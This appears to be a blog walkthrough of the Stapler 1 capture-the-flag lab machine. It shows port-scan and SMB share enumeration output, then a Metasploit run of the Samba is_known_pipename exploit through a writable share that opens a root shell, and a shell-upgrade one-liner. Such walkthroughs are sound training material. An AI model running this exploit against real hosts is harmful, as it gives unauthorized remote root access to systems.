Stapler 1 vulnerable machine walkthrough.
Firing the recon script returns:
Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-27 07:35 EST
Nmap scan report for 192.168.31.147
Host is up (0.0011s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can’t get directory listing: Can’t parse PASV response: “Permission denied.”
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| “DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 8
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, ConnectWithDatabase, LongColumnFlag, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: P\x01.”{%VMG\x02\x07s6fVY..jf
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
enum4linux also finds:
Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))[+] Attempting to map shares on 192.168.31.147
//192.168.31.147/print$ Mapping: DENIED, Listing: N/A
//192.168.31.147/kathy Mapping: OK, Listing: OK
//192.168.31.147/tmp Mapping: OK, Listing: OK
I try the low hanging fruit from my Github page and it’s a win.
msf > use exploit/linux/samba/is_known_pipename
msf exploit(linux/samba/is_known_pipename) > setg RHOST 192.168.31.147
RHOST => 192.168.31.147
msf exploit(linux/samba/is_known_pipename) > options—- ————— ——– ———–
RHOST 192.168.31.147 yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directoryExploit target:
Id Name
— —-
0 Automatic (Interact)msf exploit(linux/samba/is_known_pipename) > set RPORT 139
RPORT => 139
msf exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /tmp
SMB_SHARE_NAME => /tmp
msf exploit(linux/samba/is_known_pipename) > run[*] 192.168.31.147:139 – Using location \\192.168.31.147\tmp\ for the path
[*] 192.168.31.147:139 – Retrieving the remote path of the share ‘tmp’
[*] 192.168.31.147:139 – Share ‘tmp’ has server-side path ‘/var/tmp
[*] 192.168.31.147:139 – Uploaded payload to \\192.168.31.147\tmp\IQqlqbox.so
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IQqlqbox.so using \\PIPE\/var/tmp/IQqlqbox.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IQqlqbox.so using /var/tmp/IQqlqbox.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Uploaded payload to \\192.168.31.147\tmp\IxhxfTZL.so
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IxhxfTZL.so using \\PIPE\/var/tmp/IxhxfTZL.so…
[-] 192.168.31.147:139 – >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.31.147:139 – Loading the payload from server-side path /var/tmp/IxhxfTZL.so using /var/tmp/IxhxfTZL.so…
[+] 192.168.31.147:139 – Probe response indicates the interactive payload was loaded…
[*] Found shell.
[*] Command shell session 1 opened (192.168.31.139:40411 -> 192.168.31.147:139) at 2018-02-27 08:32:10 -0500id
uid=0(root) gid=0(root) groups=0(root)
That was fast, but no pain means no gain.
I upgrade and beautify the shell and print the flag:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Leave a Reply